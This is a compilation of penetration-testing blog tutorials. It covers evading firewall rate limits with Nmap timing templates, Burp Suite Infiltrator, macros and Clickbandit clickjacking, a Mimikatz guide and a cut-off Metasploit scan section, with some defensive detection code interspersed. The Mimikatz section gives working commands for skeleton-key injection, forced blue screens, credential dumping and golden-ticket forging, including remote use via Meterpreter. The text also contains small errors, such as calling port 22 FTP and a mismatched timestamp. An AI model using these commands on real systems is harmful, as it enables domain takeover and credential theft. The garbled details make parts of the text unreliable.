
Understanding Guide for Nmap Timing Scan (Firewall Bypass)


In this article we scan the target machine with a normal Nmap scan and with each timing template, and confirm the time between packets by analysing the Nmap traffic in Wireshark.

The timing template in Nmap is selected with -T<0-5>, where -T0 is the slowest and -T5 the fastest. By default every Nmap scan runs with the -T3 template. Timing templates trade scan speed against accuracy, so the right choice depends on the result you want.

Let’s start!!

Nmap Insane (-T5) Scan

This template sends packets insanely fast and waits only 0.3 seconds for a response. The time difference between two packets sent is up to 5 milliseconds. This makes the scan extremely fast, but accuracy is sometimes sacrificed. Nmap gives up on a host if it cannot complete the scan within 15 minutes. Beyond that, -T5 should be used only on fast networks and high-end systems, since sending packets this fast can disrupt the network or the system and can even cause a system failure.

To use a timing template, add the -T<0-5> option to the Nmap command when scanning a target network:

nmap -T5 -p21-25 192.168.1.104

Here the packets sent to the target IP are separated by at most 5 milliseconds (0.005 seconds):

Packet 1 has Arrival Time of 04:41:04.557153433

Packet 2 has Arrival Time of 04:41:04.557225304

The difference between the arrival time of Packet 1 and Packet 2 is about 0.07 milliseconds.

Nmap Aggressive (-T4) Scan

This template sends packets very fast and waits only 1.25 seconds for a response. The time difference between two packets sent is up to 10 milliseconds. The official Nmap documentation recommends -T4 for "reasonably modern and reliable networks".

nmap -T4 -p21-25 -d 192.168.1.104

Here the packets sent to the target IP are separated by at most 5 milliseconds (0.005 seconds):

Packet 1 has Arrival Time of 05:58:34.636899267

Packet 2 has Arrival Time of 05:58:34.637122896

The difference between the arrival time of Packet 1 and Packet 2 is about 0.2 milliseconds.

Nmap Normal (-T3) Scan

This is the default Nmap timing template, used whenever no -T argument is given.

nmap -T3 -p21-25 -d 192.168.1.104

Packet 1 has Arrival Time of 06:01:12.574866212

Packet 2 has Arrival Time of 06:01:12.575059033

The difference between the arrival time of Packet 1 and Packet 2 is about 0.1 milliseconds.

Nmap Polite (-T2) Scan

This template sends packets faster than -T0 and -T1 but still slower than the normal scan. The time difference between two packets sent is 0.4 seconds.

nmap -T2 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:07:38.139876513

Packet 2 has Arrival Time of 06:01:12.540686453

Nmap Sneaky (-T1) Scan

This template sends packets faster than -T0 but still far slower than the normal scan. The time difference between two packets sent is 15 seconds.

nmap -T1 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:17:02.354879724

Packet 2 has Arrival Time of 06:17:17.371063606

The difference between the arrival time of Packet 1 and Packet 2 is about 15 seconds.

Nmap Paranoid (-T0) Scan

This template sends packets very slowly, scanning only one port at a time. The time difference between two packets sent is 5 minutes.

nmap -T0 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:32:25.043303267

Packet 2 has Arrival Time of 06:37:25.080804929

The difference between the arrival time of Packet 1 and Packet 2 is about 5 minutes.
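The arrival times quoted above are what a defender reviewing a capture actually has to work with: the gap between consecutive probes from one source is what a rate-limiting rule or a slow-scan detector keys on. The following Python is an added example, not code from the article; it parses Wireshark-style arrival times at nanosecond precision and buckets each gap against the per-template gaps the article describes. The timestamp pairs are the ones quoted above; the bucket thresholds are an assumption derived from those descriptions.

```python
"""Measure inter-probe gaps from Wireshark-style arrival times.

Added example (not from the original article). The timestamps are the
Arrival Time values quoted in the article; the classification thresholds
are assumed from the article's description of the -T0 to -T5 templates.
"""

def parse_arrival(ts: str) -> int:
    """Parse 'HH:MM:SS.nnnnnnnnn' into integer nanoseconds since midnight.

    Integer arithmetic keeps the nanosecond digits exact; floats would not.
    """
    hms, _, frac = ts.partition(".")
    h, m, s = (int(x) for x in hms.split(":"))
    ns = int(frac.ljust(9, "0")[:9]) if frac else 0
    return (h * 3600 + m * 60 + s) * 1_000_000_000 + ns

def gap_seconds(first: str, second: str) -> float:
    """Gap between two arrival times in seconds, tolerating a midnight wrap."""
    delta = parse_arrival(second) - parse_arrival(first)
    if delta < 0:
        delta += 24 * 3600 * 1_000_000_000
    return delta / 1e9

def classify_gap(seconds: float) -> str:
    """Name the slowest template a gap is consistent with (assumed thresholds).

    T3-T5 send within milliseconds, T2 waits about 0.4 s, T1 about 15 s and
    T0 about 5 minutes, so anything over a minute is treated as paranoid.
    """
    if seconds < 0.01:
        return "burst (T3-T5)"
    if seconds < 5:
        return "polite (T2)"
    if seconds < 60:
        return "sneaky (T1)"
    return "paranoid (T0)"

# Packet pairs quoted in the article, one per timing template it captured.
ARTICLE_PAIRS = {
    "T5": ("04:41:04.557153433", "04:41:04.557225304"),
    "T4": ("05:58:34.636899267", "05:58:34.637122896"),
    "T3": ("06:01:12.574866212", "06:01:12.575059033"),
    "T1": ("06:17:02.354879724", "06:17:17.371063606"),
    "T0": ("06:32:25.043303267", "06:37:25.080804929"),
}

def analyse_pairs(pairs=ARTICLE_PAIRS) -> dict:
    """Return {template: (gap_in_seconds, classification)} for each pair."""
    out = {}
    for name, (a, b) in pairs.items():
        g = gap_seconds(a, b)
        out[name] = (g, classify_gap(g))
    return out

if __name__ == "__main__":
    for name, (g, label) in analyse_pairs().items():
        print(f"{name}: gap {g:.9f} s -> {label}")
```

On a real capture you would feed it consecutive SYNs from the same source rather than hand-picked pairs; a source whose gaps cluster tightly around 15 s or 300 s is the signature a slow-scan detector should alert on, since rate limits alone will not see it.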

Evading Time Based Firewall rules using timing templates

Block Insane T5 scan

Even though -T5 and -T4 speed up the scan, the target system may be using firewall rules to protect itself. Here are some example rules and the methods to get past them.

This rule blocks TCP packets from an IP address when more than one arrives within a second. In other words, only the first packet from a given IP address in any 1-second window is answered.

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 1 --hitcount 1 -j DROP

If you scan more than one port on a system with the rule above, the result will not be what you expect. With -T5 or -T4 the gap between packets is far less than 1 second, so scanning five ports at a time shows one port as open/closed and the others as filtered. But -T5 also sets --max-retries to 2, meaning it retries each unanswered port 2 more times, so 3 of the 5 ports end up with an accurate open/closed status and the remaining 2 show as filtered.

nmap -T5 -p21-25 192.168.1.104

In the image below you can see that 3 ports are shown as open and 2 as filtered.

The packet exchange between the scanner and the target, captured in Wireshark, clearly shows that TCP SYN packets were sent several times to ports 22 and 23 without any reply.

Bypass Insane T5 Firewall filter

1st Method

Use the --max-retries argument to raise the retry count so that each retry obtains an accurate status for one more port. Run the command below to increase the maximum retries for a T5 scan; here I used 4, but you can adjust it as required.

nmap -T5 -p21-25 192.168.1.104 --max-retries 4

Now, in the image below, you can see that all 5 ports are shown as open.

Here the packet capture shows that in each retry a different port sends the reply and so confirms its status, as shown in the image below.

2nd Method

The second method is to use a timing template with a larger gap between packets: any template below T5, i.e. T4 down to T0, gets past the rule above.

nmap -T4 -p21-25 192.168.1.104

or

nmap -T3 -p21-25 192.168.1.104

or

nmap -T2 -p21-25 192.168.1.104

or

nmap -T1 -p21-25 192.168.1.104

or

nmap -T0 -p21-25 192.168.1.104

Here the packet capture shows that every port sends a reply, because the gap between packets is around 6 seconds.

Block Aggressive T4, Normal T3 & Polite T2 Scan

The rules below block TCP packets from an IP address when more than one arrives within 3 seconds. In other words, only the first packet from a given IP address in any 3-second window is answered.

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 3 --hitcount 1 -j DROP

Here we use -T4 to scan 5 ports. The gap between packets is far less than 1 second, so scanning five ports at a time shows one as open/closed and the others as filtered. -T4 also sets --max-retries to 6, so it retries each port up to 6 more times, but since the time window exceeds the total time taken by all the retries, every port ends up shown as filtered.

nmap -T4 -p21-25 192.168.1.104

or

nmap -T3 -p21-25 192.168.1.104

or

nmap -T2 -p21-25 192.168.1.104


The result of the T4, T3 and T2 scans is that either all ports are shown as filtered or at most one port shows an open/closed state. In the image below you can see that all 5 ports are shown as filtered.

Here we can see that none of the packets got a reply.

Bypass Aggressive T4, Normal T3 & Polite T2 Firewall filter

To get past this kind of rule we have to use a timing template slower than -T4:

nmap -T1 -p21-25 192.168.1.104

Here we can see that all the packets got a reply, because the interval in T1 is almost 15 seconds.

Block Sneaky (-T1) Scan

This rule blocks TCP packets from an IP address when more than one arrives within 200 seconds. In other words, only the first packet from a given IP address in any 200-second window is answered.

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --set

sudo iptables -I INPUT -p tcp -m state --state NEW -m recent --update --seconds 200 --hitcount 1 -j DROP

Now repeat the T1 scan as shown below; this time you will find that the firewall blocks our Nmap probes, so the open/closed state of the ports cannot be identified.

nmap -T1 -p21-25 192.168.1.104

The result of the T1 scan is that either all ports are shown as filtered or at most one port shows an open/closed state. In the image below you can see that all 4 ports are shown as filtered.

Here we can see that only one of the packets got a reply; the rest were dropped by the firewall.

Bypass Sneaky (-T1) Scan

To get past this kind of rule we need a timing template whose gap between packets is more than 200 seconds, so use the paranoid template, where the gap between two packets is about 5 minutes, as discussed above.

nmap -T0 -p21-25 192.168.1.104

In the image below you can see that it took 1813.61 seconds, close to 30 minutes, to scan 5 ports, and found all 5 ports open.

Here we can see that we received a response to every packet even though the firewall rules were in place.

Whenever you use a slower timing template to get past an IPS or firewall, remember that the scan will take much longer than usual, so specify a small set of ports and avoid spending that time on ports you did not intend to scan.

Author: Deepanshu is a Certified Ethical Hacker and a budding security researcher. Contact here.
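The three `-m recent` rule pairs above (1-, 3- and 200-second windows) all behave the same way: the DROP rule's `--update` refreshes the source's timestamp even on the packets it drops, and the `--set` rule records the ones it lets through, so a source gets one answer per quiet window. Before deploying such a rule a defender should check what it actually does against a given probe cadence. The Python below is an added example, not the article's code: it models that refresh-on-every-packet behaviour and replays the article's scenarios. The per-template gaps and the retry counts are the article's; the spacing between retry rounds (2 seconds) is an assumption, since the article does not state Nmap's retry schedule.

```python
"""Simulate the iptables '-m recent' rate-limit rules described in the article.

Added example (not from the original article). Models:
  iptables -I INPUT -p tcp -m state --state NEW -m recent --set
  iptables -I INPUT -p tcp -m state --state NEW -m recent --update \
           --seconds W --hitcount 1 -j DROP
The DROP rule sits first, so every NEW packet refreshes last_seen whether it
is dropped ('--update') or accepted ('--set'); only a packet arriving a full
window after the previous one gets through. Round spacing is an assumption.
"""

class RecentRule:
    """Per-source state kept by '-m recent' for the two rules above."""

    def __init__(self, window):
        self.window = window      # the --seconds value
        self.last_seen = None     # time of the last NEW packet from this source

    def accept(self, t):
        """True if the packet at time t is answered, False if it is DROPped."""
        ok = self.last_seen is None or t - self.last_seen >= self.window
        self.last_seen = t        # refreshed on drop and on accept alike
        return ok

def scan_with_retries(ports, gap, window, max_retries, round_spacing):
    """One probe per port per round, re-probing only unanswered ports.

    gap: seconds between consecutive probes in a round (the template's gap).
    round_spacing: assumed seconds between the start of successive rounds.
    Returns {port: 'answered' | 'filtered'}.
    """
    rule = RecentRule(window)
    status = {p: "filtered" for p in ports}
    pending = list(ports)
    for rnd in range(max_retries + 1):
        t = rnd * round_spacing
        still_pending = []
        for p in pending:
            if rule.accept(t):
                status[p] = "answered"
            else:
                still_pending.append(p)
            t += gap
        pending = still_pending
        if not pending:
            break
    return status

def answered_count(status):
    return sum(1 for s in status.values() if s == "answered")

PORTS = [21, 22, 23, 24, 25]   # the article scans -p21-25

def article_scenarios():
    """Replay the article's cases with the assumed 2 s retry-round spacing."""
    return {
        "T5 vs 1s window":                 scan_with_retries(PORTS, 0.005, 1, 2, 2.0),
        "T5 --max-retries 4 vs 1s window": scan_with_retries(PORTS, 0.005, 1, 4, 2.0),
        # retries arriving faster than the 3 s window keep refreshing last_seen,
        # so nothing after the first probe ever gets through
        "T4 vs 3s window":                 scan_with_retries(PORTS, 0.010, 3, 6, 2.0),
        "T1 vs 3s window":                 scan_with_retries(PORTS, 15, 3, 0, 0),
        "T1 vs 200s window":               scan_with_retries(PORTS, 15, 200, 0, 0),
        "T0 vs 200s window":               scan_with_retries(PORTS, 300, 200, 0, 0),
    }

if __name__ == "__main__":
    for name, status in article_scenarios().items():
        print(f"{name}: {answered_count(status)}/{len(PORTS)} answered {status}")
```

The simulation reproduces the article's observations (3 of 5 answered with the default retries, all 5 with `--max-retries 4`, one or none against the 3-second window, everything against T0) and makes the limitation explicit: a `recent` window only blocks probes that arrive faster than the window, so it is a nuisance to fast scans and invisible to slow ones, which is why the gap analysis above, not the rate limit, is what catches a T1 or T0 scan.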

The post Understanding Guide for Nmap Timing Scan (Firewall Bypass) appeared first on Hacking Articles.


Advance Web Application Testing using Burpsuite


Hello friends!! Today we are going to discuss the advanced options of Burp Suite Pro for web penetration testing. Here we used the bWAPP lab, which you can install from here, and the Acunetix vulnerable web application, which is available online, to practise web application penetration testing.

Burp Suite Advanced Usage

  • Burp Infiltrator
  • Macros
  • Burp Clickbandit

Burp Infiltrator

Burp Infiltrator is a tool that instruments a web application so that it can be tested with Burp Scanner. Instrumenting the application lets Burp detect cases where its input reaches potentially unsafe APIs on the server side.

Burp Infiltrator supports applications written in:

  • Java, Groovy, Scala, or other JVM languages (JRE versions 1.4 – 1.8)
  • C#, VB, or other .NET languages (.NET versions 2.0 and later)

Let’s start!!

First, enable Burp Infiltrator from the Burp tab in Burp Suite by selecting the Burp Infiltrator option. A Burp Infiltrator dialog appears, where you select the type of application you want to instrument, as shown in the image.

After that, select the folder where the Infiltrator file should be saved, so that it can be run later from the terminal.

Next, give the path of the folder where the Infiltrator file will be saved, as shown in the image.

The Burp Infiltrator file is then saved as burp_infiltrator_java.jar.

Now, to run the Burp Infiltrator file, go to its folder in the terminal and execute it with the command java -jar burp_infiltrator_java.jar --non-interactive, then press Enter.

We used --non-interactive in the command so that the default settings are applied automatically; otherwise all the settings have to be configured manually. Now we can intercept the request of any website or application that matches the supported parameters, as shown in the image.

Turn off the Intercept tab. Select the Target tab, which contains a Site map sub-tab, as shown in the image.

Then select the URL you want to scan with Burp Infiltrator: right-click on the URL and select Actively scan this host. This reports all the issues found in the website or application being scanned. All the issues for the scanned URL can be seen in the Issues pane, as shown in the image.

Macros

Burp Suite has a session handling ability that can run macros according to session handling rules. A macro is a predefined sequence of one or more requests. Typical uses of macros include:

  • Fetching a page, such as the user's home page, to check whether the current session is still valid.
  • Performing a login to obtain a new valid session.
  • Obtaining a token or nonce that is then used as a parameter in another request.

Macros are recorded using your browser. When defining a macro, Burp Suite displays the Proxy history, from which you select the requests to be used in the macro. You can pick previously made requests, or record a fresh macro and select the new items from the history. Once the macro is recorded, the macro editor shows the details of the items in the macro, which you can review and configure as required.

Let’s start!!

First we intercepted the login request of the bWAPP lab, where we entered the default username and password, as shown in the image.

With the request captured in the Intercept tab, right-click anywhere on the captured request, select Do intercept, and then its sub-option Response to this request.

Then forward the captured request until we are successfully logged into the bWAPP lab.

After that, go to the Project options tab and select the Sessions tab, as shown in the image.

Click the Add button under Session Handling Rules. This opens the Session handling rule editor, where we give the rule a name under Rule description, as shown in the image.

Click the Add button under Rule Actions and select Check session is valid. This opens the Session handling action editor; enter the expression Burp should look for in the URL (here we entered login.php) and tick If session is invalid, perform the action below, as shown in the image.

Click the Add button under Select Macro. This opens the Macro Recorder, where we select from the proxy history the item we want to include in the macro, as shown in the image. Click OK.

Next the Macro Editor window opens, where we give the macro a name in the Macro description field, as shown in the image. Click OK.

This returns us to the Session handling rule editor. Click the Scope tab and tick Extender and Proxy under Tools Scope and Include all URLs under URL Scope, then click OK. The macro now runs in the background.

As you can see in the image, we are on the login page of the bWAPP lab and have not entered any login details.

We made one simple change in the URL: we replaced login.php with portal.php, as shown in the image.

This successfully logged us into the bWAPP lab without our entering any login details.

Burp Clickbandit

Burp Clickbandit is a tool in Burp Suite for generating clickjacking attacks. When you know a web page is vulnerable to clickjacking, you can use Burp Clickbandit to create an attack and to confirm that the vulnerability can actually be exploited. Take care when running Burp Clickbandit on untrusted websites: malicious JavaScript from the target site can take control of the HTML output that Burp Clickbandit generates. Burp Clickbandit has two modes:

Record Mode

Burp Clickbandit first opens in record mode. Perform one or more mouse clicks to record your clickjacking attack; these are the clicks the victim user would need to make to perform the desired action. You can also use the "disable click actions" checkbox to record clicks without the target page handling them. When you have finished recording, click the "Finish" button to enter review mode.

Review Mode

When you have finished recording your clickjacking attack, Burp Clickbandit enters review mode. This lets you review the generated attack, with the attack user interface laid over the original page UI. You can click the buttons on the attack UI to verify that the attack works.

The controls available in review mode are:

  • The + and - buttons zoom in and out.
  • The "toggle transparency" button shows or hides the original page UI.
  • The "reset" button restores the generated attack to its state before any further clicks were made.
  • The "save" button saves an HTML file containing the attack, which can be used as a real-world exploit of the clickjacking vulnerability.
  • The keyboard arrow keys reposition the attack UI over the original page UI if it is not correctly aligned.

Let’s start!!

Burp Clickbandit runs in the browser as JavaScript. It works in all current browsers except Microsoft IE and Edge.

To run Clickbandit, go to the Burp menu and select “Burp Clickbandit”.

Click the “Copy Clickbandit to clipboard” button. This will copy the Clickbandit script to your clipboard.

In your browser, visit the web page that you want to test, just as you normally would. Then open the web developer console (this may be called "developer tools" or "JavaScript console"). Paste the Clickbandit script into the console (typing allow pasting first if the console asks for it) and press Enter.

The Burp Clickbandit logo appears at the top of the browser window and the original page loads inside a frame, ready for the attack to be recorded; this is Burp Clickbandit's record mode. Perform one or more mouse clicks to record your clickjacking attack; these are the clicks the victim user would need to make to perform the desired action. You can also use the "disable click actions" checkbox to record clicks without the target page handling them. When you have finished recording, click the "Finish" button to enter review mode.

When you have finished recording your clickjacking attack, Burp Clickbandit enters review mode. This lets you review the generated attack, with the attack user interface laid over the original page UI.

Click the Save button to save an HTML file containing the attack. This file demonstrates the clickjacking vulnerability as a real-world exploit.

We opened the saved HTML file, which shows the transparent UI we created over the original UI, with a click button in the red box appearing on the page.

We can click the buttons on the attack UI to verify that the attack works. A message appears saying "You've been clickjacked", as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact here.
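Clickbandit can only produce a working attack when the target page lets another origin load it in a frame, so the defensive counterpart to the walkthrough above is to verify that each sensitive page sends a framing policy. The Python below is an added example, not Burp's code and not part of the article: it evaluates `X-Frame-Options` and the CSP `frame-ancestors` directive the way browsers do (CSP wins when both are present, and the obsolete `ALLOW-FROM` is ignored) and reports which pages remain framable. The header sets and hostnames are constructed samples.

```python
"""Classify a page's anti-framing (clickjacking) protection from its headers.

Added example (not from the original article, not Burp code). Browsers give
CSP 'frame-ancestors' precedence over X-Frame-Options, and current browsers
ignore the obsolete 'ALLOW-FROM' form, so a page with only ALLOW-FROM is as
framable as one with no header at all. Sample headers are constructed.
"""

def frame_ancestors(csp: str):
    """Return the source list of the CSP frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            # strip the quotes around keywords such as 'none' and 'self'
            return [p.strip("'\"").lower() for p in parts[1:]]
    return None

def framing_protection(headers: dict) -> str:
    """Return 'blocked', 'same-origin', 'restricted' or 'framable'."""
    lower = {k.lower(): v for k, v in headers.items()}
    sources = frame_ancestors(lower.get("content-security-policy", ""))
    if sources is not None:                  # CSP present: it decides
        if not sources or sources == ["none"]:
            return "blocked"
        if sources == ["self"]:
            return "same-origin"
        return "restricted"                  # an explicit allow-list of origins
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "blocked"
    if xfo == "SAMEORIGIN":
        return "same-origin"
    return "framable"                        # absent, ALLOW-FROM, or garbage

def find_framable(pages: dict) -> list:
    """pages: {url: response headers}. Return the URLs another origin could frame."""
    return sorted(url for url, h in pages.items() if framing_protection(h) == "framable")

# Constructed sample responses; login.php and portal.php are the page names
# used in the bWAPP walkthrough above, the host is made up.
SAMPLE_PAGES = {
    "https://portal.example/portal.php": {"X-Frame-Options": "DENY"},
    "https://portal.example/login.php": {"Content-Type": "text/html"},
    "https://portal.example/settings": {
        "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
        "X-Frame-Options": "ALLOW-FROM https://old.example",
    },
    "https://portal.example/widget": {
        "Content-Security-Policy": "frame-ancestors 'self' https://intranet.example",
    },
    "https://portal.example/legacy": {"X-Frame-Options": "ALLOW-FROM https://old.example"},
}

if __name__ == "__main__":
    for url, headers in SAMPLE_PAGES.items():
        print(f"{framing_protection(headers):12s} {url}")
    print("framable:", find_framable(SAMPLE_PAGES))
```

Run this over the headers Burp's proxy history already holds for a target: any page in the `framable` list that performs a state-changing action on a click is a candidate for the Clickbandit test above, and the fix is the same in every case, `frame-ancestors 'none'` (or `'self'`) plus `X-Frame-Options: DENY` for older browsers.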

The post Advance Web Application Testing using Burpsuite appeared first on Hacking Articles.

Understanding Guide to Mimikatz


What is Mimikatz?

Mimikatz is a tool written in C by Benjamin Delpy. It is an excellent tool for extracting plaintext passwords, hashes and Kerberos tickets from memory. It can also be used to generate Golden Tickets.

You can download Mimikatz as a ZIP from here, or build it from the Git repository here.

Mimikatz ships in two architectures, x32 and x64. Here is a screenshot of the x64 Mimikatz console.

Generate Skeleton Key with Mimikatz

Victim: Windows Server 2012 R2 (Domain Controller)

Attacker: Mimikatz (On Windows Server 2012 R2)

In this attack, Mimikatz patches the Domain Controller so that it accepts "mimikatz" as an additional logon password. This can be thought of as a master key that opens Active Directory to the attacker. The attack is performed as shown below.

First, I will try to log on to my server using mimikatz as the password.

As you can clearly see, we cannot log on to the server using 'mimikatz' as the password.

Now I will log in to the server using its real password, which is 'T00r'.

And as you can see below, I have logged in to the server using the correct password.

If you are ever logged in on a server, or have a server unlocked, you can use Mimikatz to create a skeleton key that is stored in the server's memory.

Launch the Mimikatz console for the architecture of the server (x32 or x64). First we obtain the debug privilege in Mimikatz with

Command: privilege::debug

And then we inject the Mimikatz skeleton key into the server's memory with

Command: misc::skeleton

With this, our skeleton key is successfully injected on the server.

Note: Mimikatz must be run with administrative privileges to create a skeleton key.

Now I will try to log in to the server using the skeleton key "mimikatz" that we just injected into memory. Remember that last time we tried to log in with mimikatz as the password, we were unsuccessful.

This time 'mimikatz' was accepted as the password. This does not mean that we reset the original password 'T00r': the server continues to accept 'T00r', but now it also accepts 'mimikatz'.

Remember that we injected the skeleton key into memory, not onto disk, so the next time the admin restarts the server we lose this access. The best way to protect your Domain Controller from a skeleton key is therefore to restart the server frequently, or to prevent Mimikatz from accessing its memory.

Blue Screen of Death (bsod) with Mimikatz

Attacker: Mimikatz (on Windows 7)

Victim: Windows 7

We can perform a Blue Screen of Death (BSOD) attack using Mimikatz, which shows how powerful this tool is. To trigger a BSOD on a system, follow the steps below:

  • Run Mimikatz as Administrator
  • Start the mimidrv service

Command: !+

Now trigger the BSOD with the following command.

Command: !bsod

As you can see below, we get the Blue Screen of Death error.

Note: This attack can corrupt data and potentially harm the system. Use carefully!

Display Hostname

You can extract the hostname of the victim system by typing hostname in the Mimikatz console.

Command: hostname

We have extracted the hostname of the system as Pavan-pc.

Golden Ticket Generation with Mimikatz

Attacker: Mimikatz on Windows Server 2012 R2

Victim: Windows Server 2012 R2

To generate a Golden Ticket, we need the following information:

  1. Domain
  2. SID
  3. NTLM Hash

Let's get the domain first.

To get the domain, run ipconfig /all from the command line or PowerShell.

  • The domain on my server is Pavan.local
  • To get the SID, use the whoami /user command, as shown in the image below.

Now we use Mimikatz itself to extract the NTLM hash required to generate the ticket.

First we obtain the debug privilege with the following command.

Command: privilege::debug

And now, to extract the hashes, we run the following command.

Command: sekurlsa::logonpasswords

Now we have everything we need to generate the ticket.

Syntax: kerberos::golden /domain:[Domain] /sid:[SID] /rc4:[NTLM Hash] /user:[Username To Create] /id:500 /ptt

Command: kerberos::golden /domain:PAVAN.LOCAL /sid:S-1-5-21-1118594253-693012904-2765600535 /rc4:9a7a6f22651d6a0fcc6e6a0c723c9cb0 /user:hacker /id:500 /ptt

Here I am creating the golden ticket for a user named 'hacker'; you can use any existing user of the domain or create a new one.

I am using the /ptt option to pass the ticket into the current session.

Now open a command prompt to access the share folder and execute the command below:

pushd \\WINSERVER01\c$

Now that we are in the Z: drive, execute the commands below to list the NT Directory Services folder:

cd WINDOWS\NTDS

DIR

As you can see, we get access to the share folder, which cannot be accessed without admin rights, yet we obtained it without running CMD as administrator. In the image below you can see it shows 8 files and 2 folders.

Remotely Generating Golden Ticket

Attacker: Kali

Victim: Windows Server 2012 R2

First get Meterpreter access to the server, which you can learn about here.

Once you have the Meterpreter session, upload the Mimikatz folder to the victim system using the command

Command: upload -r /root/Desktop/mimi c:\

Remember to use -r so that the upload command uploads recursively.

Open the shell and extract the domain using ipconfig /all

and the SID using whoami /user.

Now go to the location where we uploaded Mimikatz earlier and run mimikatz.exe as shown below.

Now let's extract the krbtgt NTLM hash using the following command.

Command: lsadump::lsa /inject /name:krbtgt

Now, using all the information extracted, let's generate a golden ticket in the same way as above.

Command: kerberos::golden /domain:pavan.loc /sid:S-1-5-21-97841242-3460736137-492355079 /rc4:e847d2e54044172830e3e3a6b8438853 /user:Hacker /id:500 /ptt

Now let's access the share folder. As you can see, we get access to the share folder, which cannot be accessed without admin rights.

Hence we successfully generated a golden ticket on a Windows Server remotely from Kali.
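Both golden-ticket walkthroughs above share the same detectable footprint: the ticket is minted offline from the krbtgt hash, so the domain controller never issued it and has no Event ID 4768 (TGT requested) for that account from that client when the Event ID 4769 (service ticket requested) arrives; tickets forged from an RC4 key (the `/rc4:` option used above) carry RC4-HMAC encryption (type 0x17) where AES (0x12) is otherwise the norm; and a made-up `/user:` name matches no real account. The Python below is an added example, not the article's or Mimikatz's code: it applies those three checks to a constructed list of simplified 4768/4769 events (dicts, not real exported logs). The client IPs and the account set are made up; the `hacker` name and `WINSERVER01` host come from the walkthrough.

```python
"""Hunt for forged (golden) TGT use in Kerberos audit events 4768/4769.

Added example (not from the original article). Events are simplified dicts
with keys EventID, Time, User, Client, EType (hex string as logged) and,
for 4769, Service. The sample events are constructed, not real logs.
"""
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType logged for RC4-HMAC tickets

def find_forged_ticket_use(events, known_accounts, lookback=timedelta(hours=10)):
    """Return [(time, user, [reasons])] for 4769 events that look forged.

    lookback should be at least the domain's maximum TGT lifetime (10 h by
    default) so a legitimately old TGT is not mistaken for a forged one.
    """
    # Index successful TGT issuance (4768) by (user, client) for correlation.
    tgt_times = {}
    for ev in events:
        if ev["EventID"] == 4768 and ev.get("Status", "0x0") == "0x0":
            key = (ev["User"].lower(), ev["Client"])
            tgt_times.setdefault(key, []).append(ev["Time"])

    findings = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        if ev["EventID"] != 4769:
            continue
        user = ev["User"].lower()
        reasons = []
        prior = [t for t in tgt_times.get((user, ev["Client"]), [])
                 if ev["Time"] - lookback <= t <= ev["Time"]]
        if not prior:
            reasons.append("no 4768 from this client within lookback")
        if ev["EType"] == RC4_HMAC:
            reasons.append("RC4-HMAC service ticket")
        if user not in known_accounts:
            reasons.append("account does not exist in the directory")
        if reasons:
            findings.append((ev["Time"], ev["User"], reasons))
    return findings

# Constructed sample: a normal logon by 'pavan', then an account named
# 'hacker' (the name used in the walkthrough) requesting a service ticket
# for cifs/WINSERVER01 without any TGT request on record for it.
T0 = datetime(2018, 1, 1, 9, 0, 0)
SAMPLE_EVENTS = [
    {"EventID": 4768, "Time": T0, "User": "pavan",
     "Client": "192.168.1.50", "EType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "Time": T0 + timedelta(minutes=1), "User": "pavan",
     "Client": "192.168.1.50", "EType": "0x12", "Service": "cifs/WINSERVER01"},
    {"EventID": 4769, "Time": T0 + timedelta(minutes=30), "User": "hacker",
     "Client": "192.168.1.99", "EType": "0x17", "Service": "cifs/WINSERVER01"},
]
KNOWN_ACCOUNTS = {"pavan", "administrator", "krbtgt"}

if __name__ == "__main__":
    for when, user, reasons in find_forged_ticket_use(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{when} {user}: " + "; ".join(reasons))
```

In production the 4768/4769 streams must be merged from every domain controller before correlating, because the TGT and the service ticket are often handled by different DCs; the three signals are also independent, so a forged ticket for an existing account with an AES key still trips the missing-4768 check, which is why that one is the anchor and the other two are corroboration. The durable fix after a suspected golden ticket is resetting the krbtgt password twice, which invalidates every ticket signed with the old key.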


Hack the Minesweeper Game

We have all played Minesweeper, and it is hard to get all the mines right, but those days of worry are over. To show that Mimikatz is a powerful yet playful tool, here I will cheat at Minesweeper using Mimikatz.

First open the Mimikatz build for your architecture.

And then open the Minesweeper game.

Load Minesweeper in Mimikatz using

Command: minesweeper::infos

You can see in the screenshot above that the Minesweeper grid is shown in the Mimikatz console.

Now click any random block in Minesweeper.

Now run the previous command again and we have the locations of the mines on the grid.

You can verify this image against the one from the Mimikatz console.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Contact here.

The post Understanding Guide to Mimikatz appeared first on Hacking Articles.

Port Scanning using Metasploit with IPTables


Port scanning is a technique used by penetration testers to identify the state of the network services associated with particular port numbers. For example, port 80 is used for the HTTP service and port 22 is used for the FTP service. We suggest using Nmap for enumerating port states; for best practice click here and learn how Nmap works in detail.

Metasploit also offers port scanning modules for enumerating network services, and they are easier to use than Nmap.

Let’s start!!

Requirement

Attacker:  Kali Linux (192.168.1.103)

Target: Ubuntu (192.168.1.105)

Open a terminal and add the iptables rules below for incoming traffic on the target, which drop TCP ACK packets to port 80 and SYN packets to port 22 respectively.

sudo iptables -I INPUT -p tcp --tcp-flags ALL ACK --dport 80 -j DROP

sudo iptables -I INPUT -p tcp --tcp-flags ALL SYN --dport 22 -j DROP

ACK Scan

Now open a terminal in Kali Linux and type msfconsole to load the Metasploit framework, then run the auxiliary commands below to use the specific module.

This module maps out firewall rulesets with a raw ACK scan. Any unfiltered ports found means a stateful firewall is not in place for them.

